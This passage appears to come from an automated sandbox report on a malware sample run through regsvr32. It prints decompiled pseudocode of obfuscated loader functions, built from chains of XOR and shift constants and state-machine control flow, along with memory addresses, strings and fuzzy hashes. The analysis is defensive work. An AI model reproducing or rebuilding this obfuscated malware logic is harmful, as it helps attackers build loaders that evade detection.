				_v96 = _v96 ^ 0x0285e17a;
				_v96 = _v96 ^ 0x08b84672;
				_v60 = 0x4bd9b6;
				_v60 = _v60 ^ 0x6ba7848f;
				_v60 = _v60 | 0xa40fa4df;
				_v60 = _v60 ^ 0xefe49c55;
				_v100 = 0xb12c48;
				_v100 = _v100 >> 0xf;
				_v100 = _v100 ^ 0x0d420031;
				_t259 = 0x33;
				_v100 = _v100 / _t259;
				_v100 = _v100 ^ 0x004184fb;
				_v104 = 0x387c2e;
				_v104 = _v104 << 5;
				_t260 = 0x72;
				_v104 = _v104 / _t260;
				_v104 = _v104 >> 0xc;
				_v104 = _v104 ^ 0x0003fa0e;
				_v64 = 0x9254d3;
				_v64 = _v64 ^ 0xec8ec683;
				_v64 = _v64 + 0xffff5a55;
				_v64 = _v64 ^ 0xec1fa99d;
				_v72 = 0xb608b;
				_v72 = _v72 + 0xffffc85a;
				_t261 = 0x43;
				_v72 = _v72 / _t261;
				_v72 = _v72 ^ 0x00012617;
				_v32 = 0x2b47af;
				_t262 = 0x73;
				_t254 = _v4;
				_v32 = _v32 / _t262;
				_v32 = _v32 ^ 0x0007dbbc;
				_v76 = 0xa2cc58;
				_v76 = _v76 * 0x79;
				_v76 = _v76 + 0x1556;
				_v76 = _v76 ^ 0x4cf4e816;
				_v36 = 0x411f8a;
				_v36 = _v36 ^ 0x039a7593;
				_v36 = _v36 ^ 0x03d0076c;
				_v48 = 0x32f559;
				_v48 = _v48 + 0x88cf;
				_v48 = _v48 >> 4;
				_v48 = _v48 ^ 0x000c1178;
				_v92 = 0xe53134;
				_v92 = _v92 + 0xffffd6c4;
				_v92 = _v92 + 0xfffff637;
				_v92 = _v92 ^ 0x9e819fd3;
				_v92 = _v92 ^ 0x9e661668;
				_v52 = 0x962c48;
				_v52 = _v52 + 0x54df;
				_v52 = _v52 << 4;
				_v52 = _v52 ^ 0x096c20fe;
				_v56 = 0x38983;
				_v56 = _v56 * 0x7b;
				_v56 = _v56 ^ 0x1e2e8742;
				_v56 = _v56 ^ 0x1f9fc20c;
				_v20 = 0x39c3;
				_v20 = _v20 ^ 0xdc0c04ea;
				_v20 = _v20 ^ 0xdc0d303f;
				_v44 = 0xdd799f;
				_v44 = _v44 + 0xffffa96c;
				_v44 = _v44 >> 0xc;
				_v44 = _v44 ^ 0x0003bcd5;
				_v24 = 0x7b2b38;
				_v24 = _v24 * 0x48;
				_v24 = _v24 ^ 0x22aaeece;
				_v40 = 0x38897c;
				_v40 = _v40 >> 0xe;
				_v40 = _v40 | 0xf4a0afb0;
				_v40 = _v40 ^ 0xf4ac49e4;
				_v12 = 0x92ab49;
				_v12 = _v12 ^ 0x4b1e6875;
				_v12 = _v12 ^ 0x4b80c344;
				_v16 = 0x5228cc;
				_v16 = _v16 | 0xaae3d00d;
				_v16 = _v16 ^ 0xaaf963f0;
				while(1) {
					L1:
					_t263 = 0x5c;
					while(1) {
						_t246 = 0xc02063;
						do {
							L3:
							while(_t290 != 0x13579) {
								if(_t290 == _t246) {
									_t248 = E04BA298D(_v20, _v44, _v24, _v8, _t254);
									_t294 =  &(_t294[3]);
									__eflags = _t248;
									_t290 = 0x13579;
									_v4 = 0 | __eflags == 0x00000000;
									goto L1;
								} else {
									if(_t290 == 0x79b4c83) {
										_push(_v88);
										_push(_v84);
										_push(_v80);
										__eflags = E04B82DEA(_v96,  &_v8, _v60, 0x4b810a0, _v28, _v100, 0x4b810a0, 0x4b810a0, _v104, _v64, 0x4b810a0, 0x4b810a0, _v68, _v72, _v32, _v76, _v36, E04B9E1F8(0x4b810a0, _v108, __eflags));
										_t290 =  ==  ? 0xc02063 : 0x61b9dc3;
										E04B9FECB(_t249, _v48, _v92, _v52, _v56);
										_t294 =  &(_t294[0x16]);
										L16:
										_t246 = 0xc02063;
										_t263 = 0x5c;
									} else {
										if(_t290 == 0xa5173af) {
											_t290 = 0xac8592e;
											continue;
										} else {
											if(_t290 == 0xac8592e) {
												_t255 =  *0x4ba6214; // 0x0
												_t256 = _t255 + 0x23c;
												while( *_t256 != _t263) {
													_t256 = _t256 + 2;
													__eflags = _t256;
												}
												_t254 = _t256 + 2;
												_t290 = 0x79b4c83;
												_t246 = 0xc02063;
												continue;
											}
										}
									}
								}
								goto L17;
							}
							E04B853D0(_v40, _v12, _v16, _v8);
							_t290 = 0x61b9dc3;
							goto L16;
							L17:
							__eflags = _t290 - 0x61b9dc3;
						} while (__eflags != 0);
						return _v4;
					}
				}
			}

0x04b9dc71
0x04b9dc74
0x04b9dc7e
0x04b9dc85
0x04b9dc8d
0x04b9dc95
0x04b9dca1
0x04b9dca5
0x04b9dcb0
0x04b9dcb5
0x04b9dcbb
0x04b9dcc3
0x04b9dccb
0x04b9dcd7
0x04b9dcdc
0x04b9dce2
0x04b9dcea
0x04b9dcf2
0x04b9dcfa
0x04b9dd02
0x04b9dd07
0x04b9dd0f
0x04b9dd17
0x04b9dd1f
0x04b9dd24
0x04b9dd2c
0x04b9dd34
0x04b9dd39
0x04b9dd3e
0x04b9dd46
0x04b9dd4e
0x04b9dd56
0x04b9dd5b
0x04b9dd63
0x04b9dd6b
0x04b9dd73
0x04b9dd7b
0x04b9dd83
0x04b9dd8b
0x04b9dd93
0x04b9dd98
0x04b9dda4
0x04b9dda9
0x04b9ddaf
0x04b9ddb7
0x04b9ddbf
0x04b9ddc8
0x04b9ddcd
0x04b9ddd3
0x04b9ddd8
0x04b9dde0
0x04b9dde8
0x04b9ddf0
0x04b9ddf8
0x04b9de00
0x04b9de08
0x04b9de14
0x04b9de17
0x04b9de1d
0x04b9de2a
0x04b9de38
0x04b9de3b
0x04b9de3f
0x04b9de43
0x04b9de4b
0x04b9de58
0x04b9de5c
0x04b9de64
0x04b9de6c
0x04b9de74
0x04b9de7c
0x04b9de84
0x04b9de8c
0x04b9de94
0x04b9de99
0x04b9dea1
0x04b9dea9
0x04b9deb1
0x04b9deb9
0x04b9dec1
0x04b9dec9
0x04b9ded1
0x04b9ded9
0x04b9dede
0x04b9dee6
0x04b9def3
0x04b9def7
0x04b9deff
0x04b9df07
0x04b9df0f
0x04b9df17
0x04b9df1f
0x04b9df27
0x04b9df2f
0x04b9df34
0x04b9df3c
0x04b9df49
0x04b9df4d
0x04b9df55
0x04b9df5d
0x04b9df62
0x04b9df6a
0x04b9df72
0x04b9df7a
0x04b9df82
0x04b9df8a
0x04b9df92
0x04b9df9a
0x04b9dfa2
0x04b9dfa2
0x04b9dfa4
0x04b9dfa5
0x04b9dfa5
0x04b9dfaa
0x00000000
0x04b9dfaa
0x04b9dfb8
0x04b9e0a0
0x04b9e0a7
0x04b9e0aa
0x04b9e0ac
0x04b9e0b4
0x00000000
0x04b9dfbe
0x04b9dfc4
0x04b9e001
0x04b9e00a
0x04b9e00e
0x04b9e065
0x04b9e082
0x04b9e085
0x04b9e08a
0x04b9e0d6
0x04b9e0d8
0x04b9e0dd
0x04b9dfc6
0x04b9dfcc
0x04b9dffa
0x00000000
0x04b9dfce
0x04b9dfd4
0x04b9dfda
0x04b9dfe0
0x04b9dfeb
0x04b9dfe8
0x04b9dfe8
0x04b9dfe8
0x04b9dff0
0x04b9dff3
0x04b9dfa5
0x00000000
0x04b9dfa5
0x04b9dfd4
0x04b9dfcc
0x04b9dfc4
0x00000000
0x04b9dfb8
0x04b9e0cd
0x04b9e0d4
0x00000000
0x04b9e0de
0x04b9e0de
0x04b9e0de
0x04b9e0f1
0x04b9e0f1
0x04b9dfa5

Strings

s~eP, xrefs: 04B9DCFA
fH, xrefs: 04B9DD3E
H%, xrefs: 04B9DCE2
8+{, xrefs: 04B9DF3C
1, xrefs: 04B9DD98
41, xrefs: 04B9DEA1
.|8, xrefs: 04B9DDB7

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: .|8$1$41$8+{$H%$fH$s~eP
API String ID: 0-3664284304
Opcode ID: 68e50243246eaf78a3beebd190905aedb787d07de8e6cd51278fdd4663d3ad27
Instruction ID: 10d2f2237deacd9f068f4fa53eebb3ddb2dde3d7a491ae78dac1123227821909
Opcode Fuzzy Hash: 68e50243246eaf78a3beebd190905aedb787d07de8e6cd51278fdd4663d3ad27
Instruction Fuzzy Hash: BBB12F725083809FD768CF25D88A50BFBE2FBC4748F10891DF29A86260D7B9D949CF46

Uniqueness

Uniqueness Score: -1.00%

Function 04B8670B, Relevance: 9.0, Strings: 7, Instructions: 232
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E04B8670B() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				void* _t233;
				signed int _t236;
				signed int _t238;
				void* _t239;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t258;
				intOrPtr _t259;
				void* _t261;
				void* _t266;
				void* _t268;

				_v576 = 0x5c6bdc;
				_v572 = 0xae866a;
				_t259 = 0;
				_t261 = 0xb8e9ee3;
				_v568 = 0;
				_v612 = 0xec3aec;
				_t5 =  &_v612; // 0xec3aec
				_t241 = 0x62;
				_v612 =  *_t5 * 0x6c;
				_v612 = _v612 | 0xdabeec40;
				_v612 = _v612 ^ 0xfbbeff50;
				_v604 = 0x37b038;
				_v604 = _v604 >> 0xd;
				_v604 = _v604 ^ 0x000001bc;
				_v624 = 0x7f5f56;
				_v624 = _v624 + 0xffff5a99;
				_v624 = _v624 << 4;
				_v624 = _v624 ^ 0x07eb9ef3;
				_v628 = 0x55d92;
				_v628 = _v628 >> 0x10;
				_v628 = _v628 ^ 0x0529ff2d;
				_v628 = _v628 ^ 0x052de72a;
				_v664 = 0x989cfa;
				_v664 = _v664 * 0x6a;
				_v664 = _v664 | 0x8da787ac;
				_v664 = _v664 + 0xffffc08b;
				_v664 = _v664 ^ 0xbfb72d66;
				_v672 = 0x5126c1;
				_v672 = _v672 << 0xa;
				_v672 = _v672 | 0x6300e881;
				_v672 = _v672 * 0x1d;
				_v672 = _v672 ^ 0xbca67a4e;
				_v636 = 0x3defe6;
				_t49 =  &_v636; // 0x3defe6
				_v636 =  *_t49 * 9;
				_t51 =  &_v636; // 0x3defe6
				_v636 =  *_t51 * 0x52;
				_v636 = _v636 ^ 0xb28641ab;
				_v632 = 0xea2077;
				_t56 =  &_v632; // 0xea2077
				_v632 =  *_t56 * 0x65;
				_v632 = _v632 << 2;
				_v632 = _v632 ^ 0x7174f9be;
				_v660 = 0x2cce37;
				_v660 = _v660 << 0xd;
				_v660 = _v660 / _t241;
				_v660 = _v660 << 4;
				_v660 = _v660 ^ 0x1917ca80;
				_v676 = 0x92ca3e;
				_t242 = 0x12;
				_v676 = _v676 * 0x4b;
				_v676 = _v676 << 0xf;
				_v676 = _v676 >> 2;
				_v676 = _v676 ^ 0x28034127;
				_v596 = 0xf7772a;
				_v596 = _v596 + 0xffff3df8;
				_v596 = _v596 ^ 0x00fc52ab;
				_v644 = 0x6698d1;
				_v644 = _v644 | 0xc199dbe0;
				_v644 = _v644 ^ 0xc1fcc133;
				_v592 = 0x7143e7;
				_v592 = _v592 >> 2;
				_v592 = _v592 ^ 0x0010b3e1;
				_v652 = 0x9a4189;
				_v652 = _v652 * 0x60;
				_v652 = _v652 / _t242;
				_v652 = _v652 ^ 0x033cbda1;
				_v668 = 0xc5fab;
				_v668 = _v668 << 0xb;
				_v668 = _v668 >> 9;
				_v668 = _v668 + 0x8f67;
				_v668 = _v668 ^ 0x0031c4ff;
				_v600 = 0x6e8ee8;
				_v600 = _v600 ^ 0x0d880c60;
				_v600 = _v600 ^ 0x0deba949;
				_v616 = 0xb65c97;
				_v616 = _v616 + 0xffff6050;
				_v616 = _v616 << 6;
				_v616 = _v616 ^ 0x2d666d98;
				_v640 = 0xcc6d21;
				_t243 = 0x1b;
				_v640 = _v640 / _t243;
				_v640 = _v640 >> 0xe;
				_v640 = _v640 ^ 0x000eaea1;
				_v680 = 0x87d5f6;
				_t244 = 0x76;
				_v680 = _v680 * 0x1f;
				_v680 = _v680 << 9;
				_v680 = _v680 + 0xffff990b;
				_v680 = _v680 ^ 0xe5dd4258;
				_v608 = 0xe96961;
				_v608 = _v608 | 0xb6f9188e;
				_v608 = _v608 ^ 0xb6fb8930;
				_v656 = 0xc61929;
				_v656 = _v656 >> 2;
				_v656 = _v656 + 0xcacc;
				_v656 = _v656 << 2;
				_v656 = _v656 ^ 0x00c38b27;
				_v648 = 0x21afdf;
				_v648 = _v648 + 0x614;
				_v648 = _v648 + 0x692f;
				_v648 = _v648 ^ 0x002627a2;
				_v620 = 0xc6d0;
				_v620 = _v620 + 0xee3f;
				_t240 = _v608;
				_v620 = _v620 / _t244;
				_v620 = _v620 ^ 0x0005d3ba;
				do {
					while(_t261 != 0x885c2e) {
						if(_t261 == 0x1fa5b7d) {
							_t244 = _v628;
							_t233 = E04BA0DB1(_t244,  &_v524, __eflags, _v664, _t244, _v672);
							_t268 = _t268 + 0xc;
							__eflags = _t233;
							if(__eflags != 0) {
								_t261 = 0x6c35f0b;
								continue;
							}
						} else {
							if(_t261 == 0x4edc737) {
								_push(_t244);
								_t236 = E04B9DBC1(_t240, _v652,  &_v564, _t244, _v668, _v600, _v616);
								_t258 = _v680;
								_t244 = _v640;
								asm("sbb esi, esi");
								_t261 = ( ~_t236 & 0xfe84828b) + 0x203d9a3;
								E04BA1538(_t244, _t258, _t240);
								_t268 = _t268 + 0x1c;
								goto L14;
							} else {
								if(_t261 == 0x6c35f0b) {
									_t258 = _v636;
									_t244 =  &_v524;
									_t238 = E04BA45CA(_t244, _t258, _t244, _t244, _v632, _v660, _v676, _v612, _v596, _v644, _t259, _v592, _v624, _v604);
									_t240 = _t238;
									_t268 = _t268 + 0x30;
									__eflags = _t238 - 0xffffffff;
									if(__eflags != 0) {
										_t261 = 0x4edc737;
										continue;
									}
								} else {
									if(_t261 == 0x8f2e6fb) {
										_t239 = E04B85477(_t244);
										_t266 = _v588 - _v548;
										asm("sbb ecx, [esp+0x9c]");
										__eflags = _v584 - _t258;
										if(__eflags >= 0) {
											if(__eflags > 0) {
												L19:
												_t259 = 1;
												__eflags = 1;
											} else {
												__eflags = _t266 - _t239;
												if(_t266 >= _t239) {
													goto L19;
												}
											}
										}
									} else {
										if(_t261 != 0xb8e9ee3) {
											goto L14;
										} else {
											_t261 = 0x1fa5b7d;
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t259;
					}
					_t244 = _v608;
					E04B9CA1F(_t244, _v656,  &_v588, _v648, _v620);
					_t268 = _t268 + 0xc;
					_t261 = 0x8f2e6fb;
					L14:
					__eflags = _t261 - 0x203d9a3;
				} while (__eflags != 0);
				goto L20;
			}

0x04b86711
0x04b8671b
0x04b86727
0x04b86729
0x04b8672e
0x04b86735
0x04b8673d
0x04b86744
0x04b86747
0x04b8674b
0x04b86753
0x04b8675b
0x04b86763
0x04b86768
0x04b86770
0x04b86778
0x04b86780
0x04b86785
0x04b8678d
0x04b86795
0x04b8679a
0x04b867a2
0x04b867aa
0x04b867b7
0x04b867bb
0x04b867c3
0x04b867cb
0x04b867d3
0x04b867db
0x04b867e0
0x04b867ed
0x04b867f1
0x04b867f9
0x04b86801
0x04b86806
0x04b8680a
0x04b8680f
0x04b86813
0x04b8681b
0x04b86823
0x04b86828
0x04b8682c
0x04b86831
0x04b86839
0x04b86841
0x04b8684e
0x04b86852
0x04b86857
0x04b8685f
0x04b8686c
0x04b8686d
0x04b86871
0x04b86876
0x04b8687b
0x04b86883
0x04b8688b
0x04b86893
0x04b8689b
0x04b868a3
0x04b868ab
0x04b868b3
0x04b868bb
0x04b868c0
0x04b868c8
0x04b868d5
0x04b868df
0x04b868e5
0x04b868f2
0x04b868fa
0x04b868ff
0x04b86904
0x04b8690c
0x04b86914
0x04b8691c
0x04b86924
0x04b8692c
0x04b86934
0x04b8693c
0x04b86941
0x04b86949
0x04b86957
0x04b8695c
0x04b86962
0x04b86967
0x04b8696f
0x04b8697c
0x04b8697d
0x04b86981
0x04b86986
0x04b8698e
0x04b86996
0x04b8699e
0x04b869a6
0x04b869ae
0x04b869b6
0x04b869bb
0x04b869c3
0x04b869c8
0x04b869d0
0x04b869d8
0x04b869e0
0x04b869e8
0x04b869f0
0x04b869f8
0x04b86a06
0x04b86a0a
0x04b86a0e
0x04b86a16
0x04b86a16
0x04b86a24
0x04b86afb
0x04b86aff
0x04b86b04
0x04b86b07
0x04b86b09
0x04b86b0b
0x00000000
0x04b86b0b
0x04b86a2a
0x04b86a30
0x04b86aa5
0x04b86ac1
0x04b86ac6
0x04b86acc
0x04b86ad3
0x04b86adb
0x04b86ae1
0x04b86ae6
0x00000000
0x04b86a32
0x04b86a38
0x04b86a7b
0x04b86a81
0x04b86a88
0x04b86a8d
0x04b86a8f
0x04b86a92
0x04b86a95
0x04b86a9b
0x00000000
0x04b86a9b
0x04b86a3a
0x04b86a40
0x04b86b45
0x04b86b4e
0x04b86b59
0x04b86b60
0x04b86b62
0x04b86b64
0x04b86b6a
0x04b86b6c
0x04b86b6c
0x04b86b66
0x04b86b66
0x04b86b68
0x00000000
0x00000000
0x04b86b68
0x04b86b64
0x04b86a46
0x04b86a4c
0x00000000
0x04b86a52
0x04b86a52
0x00000000
0x04b86a52
0x04b86a4c
0x04b86a40
0x04b86a38
0x04b86a30
0x04b86b6d
0x04b86b79
0x04b86b79
0x04b86b25
0x04b86b2a
0x04b86b2f
0x04b86b32
0x04b86b37
0x04b86b37
0x04b86b37
0x00000000

Strings

ai, xrefs: 04B86996
w , xrefs: 04B86823
Cq, xrefs: 04B868B3
=, xrefs: 04B86801
/i, xrefs: 04B869E0
:, xrefs: 04B8673D
?, xrefs: 04B869F8

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: /i$?$ai$w $:$Cq$=
API String ID: 0-170593755
Opcode ID: 6a76146150763d185147f5716e969069fdfaef2cf1abbd44bbf6199f519e4632
Instruction ID: ea169671360ab3225612a636bddcb6f49d4240cdf8ab4321a1571129f779bd3d
Opcode Fuzzy Hash: 6a76146150763d185147f5716e969069fdfaef2cf1abbd44bbf6199f519e4632
Instruction Fuzzy Hash: A2B130728083809FC368DF65C58A90BFBE1BBD4748F108A1DF5E9A6220D3B59919CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1000A803, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70
libraryCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E1000A803(void* __ebx, void* __ecx, void* __edx, void* __edi, int _a4) {
				signed int _v8;
				char _v284;
				char _v288;
				void* __esi;
				void* __ebp;
				signed int _t9;
				intOrPtr* _t18;
				void* _t26;
				void* _t27;
				void* _t33;
				signed int _t34;
				void* _t35;
				signed int _t36;
				void* _t37;

				_t33 = __edi;
				_t32 = __edx;
				_t28 = __ecx;
				_t26 = __ebx;
				_t9 =  *0x10057a08; // 0xe86d94f5
				_v8 = _t9 ^ _t36;
				_t39 = _a4 - 0x800;
				_t35 = __ecx;
				if(_a4 != 0x800) {
					__eflags = GetLocaleInfoA(_a4, 3,  &_v288, 4);
					if(__eflags != 0) {
						goto L2;
					} else {
					}
				} else {
					_push(E1001808E(__edx,  &_v288, 4, "LOC"));
					E10009BC7(__ebx, _t28, __edi, _t35);
					_t37 = _t37 + 0x10;
					L2:
					_push(_t26);
					_push(_t33);
					_t34 =  *(E10017D62(_t39));
					 *(E10017D62(_t39)) =  *_t14 & 0x00000000;
					_t35 = 0x112;
					_t27 = E10016E0C( &_v284, 0x112, 0x111, 0x112,  &_v288);
					_t18 = E10017D62(_t39);
					_t40 =  *_t18;
					if( *_t18 == 0) {
						 *(E10017D62(__eflags)) = _t34;
					} else {
						E10009DD1( *((intOrPtr*)(E10017D62(_t40))));
					}
					if(_t27 == 0xffffffff || _t27 >= _t35) {
						_t12 = 0;
						__eflags = 0;
					} else {
						_t12 = LoadLibraryA( &_v284);
					}
					_pop(_t33);
					_pop(_t26);
				}
				return E100167D5(_t12, _t26, _v8 ^ _t36, _t32, _t33, _t35);
			}

0x1000a803
0x1000a803
0x1000a803
0x1000a803
0x1000a80c
0x1000a813
0x1000a816
0x1000a81e
0x1000a826
0x1000a89a
0x1000a89c
0x00000000
0x00000000
0x1000a89e
0x1000a828
0x1000a835
0x1000a836
0x1000a83b
0x1000a83e
0x1000a83e
0x1000a83f
0x1000a845
0x1000a84c
0x1000a85c
0x1000a871
0x1000a873
0x1000a878
0x1000a87b
0x1000a8a5
0x1000a87d
0x1000a884
0x1000a889
0x1000a8aa
0x1000a8bf
0x1000a8bf
0x1000a8b0
0x1000a8b7
0x1000a8b7
0x1000a8c1
0x1000a8c2
0x1000a8c2
0x1000a8cf

APIs

_strcpy_s.LIBCMT ref: 1000A830

Part of subcall function 10009BC7: __CxxThrowException@8.LIBCMT ref: 1000A0EF
Part of subcall function 10009BC7: __EH_prolog3.LIBCMT ref: 1000A0FC

Part of subcall function 10017D62: __getptd_noexit.LIBCMT ref: 10017D62

__snprintf_s.LIBCMT ref: 1000A869

Part of subcall function 10016E0C: __vsnprintf_s_l.LIBCMT ref: 10016E21

GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 1000A894
LoadLibraryA.KERNEL32(?), ref: 1000A8B7

Strings

LOC, xrefs: 1000A828

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Exception@8H_prolog3InfoLibraryLoadLocaleThrow__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
String ID: LOC
API String ID: 4018564869-519433814
Opcode ID: 85c29d921faf756db8e7e017259237103e49a4f88e38b04ce28b663785a5d064
Instruction ID: ee9450464cbd3e0ce3331b4d2b41357aa0e69ec1529eb2fe66138b72776ed960
Opcode Fuzzy Hash: 85c29d921faf756db8e7e017259237103e49a4f88e38b04ce28b663785a5d064
Instruction Fuzzy Hash: A9119A7190411CABF725D760DC86BDD37B8EF06790F504161F6049B191DF74AEC68BA1

Uniqueness

Uniqueness Score: -1.00%

Function 04B94A66, Relevance: 7.8, Strings: 6, Instructions: 269
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E04B94A66() {
				char _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				void* _t271;
				void* _t272;
				intOrPtr _t277;
				intOrPtr _t283;
				signed int _t285;
				intOrPtr _t287;
				void* _t289;
				intOrPtr _t294;
				intOrPtr _t311;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				intOrPtr _t325;
				signed int* _t327;
				void* _t330;

				_t327 =  &_v640;
				_v532 = 0x9eda53;
				_v528 = 0x2697e4;
				_t289 = 0xd8634eb;
				_t325 = 0;
				_v524 = 0;
				_v580 = 0x257a8f;
				_v580 = _v580 + 0xffff0a69;
				_t317 = 0x46;
				_v580 = _v580 / _t317;
				_v580 = _v580 ^ 0x00008592;
				_v556 = 0x213626;
				_t16 =  &_v556; // 0x213626
				_t318 = 0x3f;
				_v556 =  *_t16 * 0x37;
				_v556 = _v556 ^ 0x0722a203;
				_v564 = 0xc854a8;
				_v564 = _v564 >> 0xd;
				_v564 = _v564 ^ 0x000f067d;
				_v568 = 0x3071d1;
				_v568 = _v568 + 0xffff48c8;
				_v568 = _v568 ^ 0x002621f6;
				_v548 = 0x47fca2;
				_v548 = _v548 ^ 0x7cca96d7;
				_v548 = _v548 ^ 0x7c82555f;
				_v624 = 0xc0bc8e;
				_v624 = _v624 | 0x773eab6a;
				_v624 = _v624 + 0x32c;
				_v624 = _v624 + 0xe315;
				_v624 = _v624 ^ 0x77fb7a9a;
				_v544 = 0x592636;
				_v544 = _v544 << 0xb;
				_v544 = _v544 ^ 0xc9333252;
				_v572 = 0x38b1a;
				_v572 = _v572 ^ 0xe2d962db;
				_v572 = _v572 ^ 0xe2dfc1be;
				_v592 = 0x205e14;
				_v592 = _v592 + 0xffffa7ef;
				_v592 = _v592 + 0xffff7efd;
				_v592 = _v592 ^ 0x001a340d;
				_v540 = 0xa56fb;
				_v540 = _v540 ^ 0x6fafefe0;
				_v540 = _v540 ^ 0x6fae5e5f;
				_v616 = 0x18df03;
				_v616 = _v616 >> 6;
				_v616 = _v616 + 0x4bd4;
				_v616 = _v616 * 0xb;
				_v616 = _v616 ^ 0x000ee45e;
				_v632 = 0xf97e7d;
				_v632 = _v632 >> 0xe;
				_v632 = _v632 << 1;
				_v632 = _v632 >> 8;
				_v632 = _v632 ^ 0x0007c205;
				_v588 = 0x1ac705;
				_v588 = _v588 >> 0xe;
				_v588 = _v588 | 0x5b484d5d;
				_v588 = _v588 ^ 0x5b49b1bf;
				_v608 = 0xcfa712;
				_v608 = _v608 << 0xb;
				_v608 = _v608 + 0xffff02b3;
				_v608 = _v608 / _t318;
				_v608 = _v608 ^ 0x01ff3be8;
				_v600 = 0x40b8c7;
				_v600 = _v600 >> 0xe;
				_v600 = _v600 + 0xffff3f18;
				_v600 = _v600 ^ 0xffff31b4;
				_v560 = 0xb86873;
				_v560 = _v560 * 0x79;
				_v560 = _v560 ^ 0x572fdc31;
				_v596 = 0x3e642a;
				_t319 = 0x51;
				_v596 = _v596 / _t319;
				_t320 = 0x15;
				_v596 = _v596 / _t320;
				_v596 = _v596 ^ 0x00087e57;
				_v636 = 0x2d2a20;
				_t132 =  &_v636; // 0x2d2a20
				_t321 = 0x64;
				_v636 =  *_t132 * 0x60;
				_v636 = _v636 + 0xd33d;
				_v636 = _v636 << 5;
				_v636 = _v636 ^ 0x1e1aa121;
				_v640 = 0xb10dcc;
				_v640 = _v640 | 0xc382035c;
				_v640 = _v640 << 7;
				_v640 = _v640 | 0x409aa621;
				_v640 = _v640 ^ 0xd99a11e4;
				_v584 = 0xf23298;
				_v584 = _v584 / _t321;
				_v584 = _v584 << 0xa;
				_v584 = _v584 ^ 0x09bffa87;
				_v620 = 0xffd84f;
				_v620 = _v620 + 0x561c;
				_v620 = _v620 + 0x86f;
				_v620 = _v620 ^ 0xc18b30ac;
				_v620 = _v620 ^ 0xc08b73c8;
				_v628 = 0x373ddb;
				_v628 = _v628 | 0x384c5e9f;
				_v628 = _v628 >> 0xc;
				_v628 = _v628 + 0xc32f;
				_v628 = _v628 ^ 0x000038bb;
				_v604 = 0xfde248;
				_v604 = _v604 + 0xffff394c;
				_t322 = 0x71;
				_v604 = _v604 * 0xa;
				_v604 = _v604 ^ 0x90dc5ac9;
				_v604 = _v604 ^ 0x99310c60;
				_v576 = 0xeb2acc;
				_v576 = _v576 / _t322;
				_v576 = _v576 >> 0xf;
				_v576 = _v576 ^ 0x000b47a1;
				_v612 = 0xe0e237;
				_t199 =  &_v612; // 0xe0e237
				_t323 = 0x22;
				_v612 =  *_t199 * 0x63;
				_v612 = _v612 << 0xf;
				_v612 = _v612 + 0xffff9396;
				_v612 = _v612 ^ 0xbdacf125;
				_v552 = 0xa3e3d4;
				_t324 = _v536;
				_v552 = _v552 / _t323;
				_v552 = _v552 ^ 0x00068221;
				goto L1;
				do {
					while(1) {
						L1:
						_t330 = _t289 - 0xa9836df;
						if(_t330 > 0) {
							break;
						}
						if(_t330 == 0) {
							E04B83046(_v616, _v632, _v588, _t324, _v608);
							_t327 =  &(_t327[3]);
							L12:
							_t289 = 0xc26911c;
							continue;
						}
						if(_t289 == 0x7276a71) {
							_v536 = _v580;
							goto L12;
						}
						if(_t289 == 0x85778ce) {
							E04B907F4();
							_t289 = 0x9029ee2;
							continue;
						}
						if(_t289 == 0x9029ee2) {
